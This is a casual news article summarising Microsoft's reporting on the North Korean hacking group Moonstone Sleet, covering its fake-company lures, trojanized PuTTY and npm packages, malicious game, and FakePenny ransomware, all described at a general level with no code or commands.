Microsoft just dug up some intriguing intel on a new North Korean hacker bunch. They’re calling them Moonstone Sleet. Quite the catchy name, right? Anyway, this sneaky group has been wreaking havoc with cyber attacks all over the map. And they’re not picky—they’re going after everyone from software and IT folks to educators and defence peeps.
What’s their weapon of choice, you ask? Oh, the usual suspects like ransomware and some nasty bespoke malware that has ties to the notorious Lazarus Group.
Here’s an interesting tidbit I found fascinating. Microsoft’s Threat Intelligence gurus did a deep dive and laid out what Moonstone Sleet has been up to. Brace yourself: these hackers are setting up fake companies and bogus job offers! I mean, who does that? It’s like catfishing but for cybersecurity.
Not stopping there, they’re even getting craftier by using trojanized versions of legit tools (those unsuspecting helpers), whipping up malicious games, and spreading around fresh custom ransomware like confetti at New Year’s Eve.
They’ve got this uncanny knack for blending old-school hacking tricks with some pretty unique strategies of their own. These guys are mixing it up in ways that would make any techie shake in their boots.
Initially tracked under the name Storm-1789, Moonstone Sleet is considered a state-aligned group with strong tactical overlaps with the Lazarus Group, also known as Diamond Sleet. However, they have since developed their distinct identity through separate infrastructure and tradecraft.
The similarities with Lazarus include reusing known malware such as Comebacker, first seen in January 2021 targeting security researchers. Lazarus used Comebacker as recently as February, embedding it within seemingly harmless Python and npm packages to establish contact with command-and-control servers.
To support their diverse goals, Moonstone Sleet also pursues employment in software development positions at legitimate companies. This likely aims to generate illicit revenue for the sanctions-hit country or gain covert access to organisations.
Attack chains observed in August 2023 involved using a modified version of PuTTY, a tactic adopted by Lazarus in late 2022 as part of Operation Dream Job.
This method involved using LinkedIn, Telegram, and developer freelancing platforms to send targets a .ZIP archive containing a trojanized version of putty.exe and a text file with an IP address and a password. When the provided IP and password were entered into PuTTY, it decrypted and executed an embedded payload.
Another attack sequence involved malicious npm packages delivered through LinkedIn or freelancing websites, masquerading as a fake company to send .ZIP files containing a harmful npm package under the guise of a technical skills assessment.
These packages connected to an actor-controlled IP address and dropped payloads similar to SplitLoader or facilitated credential theft from the Windows Local Security Authority Subsystem Service (LSASS) process.
The targeting of npm developers using counterfeit packages has been associated with a campaign previously documented by Palo Alto Networks Unit 42, named Contagious Interview (also known as DEV#POPPER).
Microsoft tracks this activity under the name Storm-1877. Rogue npm packages have also been a malware delivery vector for another North Korean-linked group, Jade Sleet (aka TraderTraitor and UNC4899), implicated in the JumpCloud hack last year.
Since February 2024, Microsoft has detected attacks involving a malicious tank game called DeTankWar. Distributed via email or messaging platforms, the game appears legitimate, with fake websites and accounts on social media.
Moonstone Sleet typically approaches targets through messaging platforms or email, presenting itself as a game developer seeking investment or developer support, often masquerading as a legitimate blockchain company or using fake companies.
For example, Moonstone Sleet used a fake company called C.C. Waterfall to contact targets, presenting the game as a blockchain-related project and offering collaboration opportunities.
The email included a link to download the game, which came with a malware loader referred to as YouieLoad. This loader can deploy next-stage payloads, create malicious services, and collect browser data.
Another fake company, StarGlow Ventures, was created for social engineering campaigns, complete with a custom domain, fake employee personas, and social media accounts. StarGlow Ventures masqueraded as a legitimate software development company to reach out to prospective targets for collaboration on web apps, mobile apps, blockchain, and AI projects.
The campaign, running from January to April 2024, involved email messages embedded with a tracking pixel to determine recipient engagement for future revenue generation opportunities.
The latest tool in Moonstone Sleet’s arsenal is a custom ransomware variant called FakePenny. This ransomware was deployed against an unnamed defence technology company in April 2024, demanding a $6.6 million ransom in Bitcoin.
The use of ransomware is reminiscent of tactics used by Andariel (aka Onyx Sleet), a sub-group within the Lazarus umbrella known for ransomware families like H0lyGh0st and Maui.
To defend against attacks by Moonstone Sleet, Microsoft urges software companies to be vigilant for supply chain attacks, as North Korean threat actors frequently poison the software supply chain to conduct widespread malicious operations. Moonstone Sleet’s diverse set of tactics is notable for their effectiveness and evolution from other North Korean threat actors over many years to meet North Korean cyber objectives.
This disclosure comes as South Korea recently accused North Korea, particularly the Lazarus Group, of stealing 1,014 gigabytes of data and documents, including names, resident registration numbers, and financial records, from a court network between January 7, 2021, and February 9, 2023, as reported by Korea JoongAng Daily. This further emphasises the persistent threat posed by North Korean cyber activities.
Click here, to know how to protect your company.
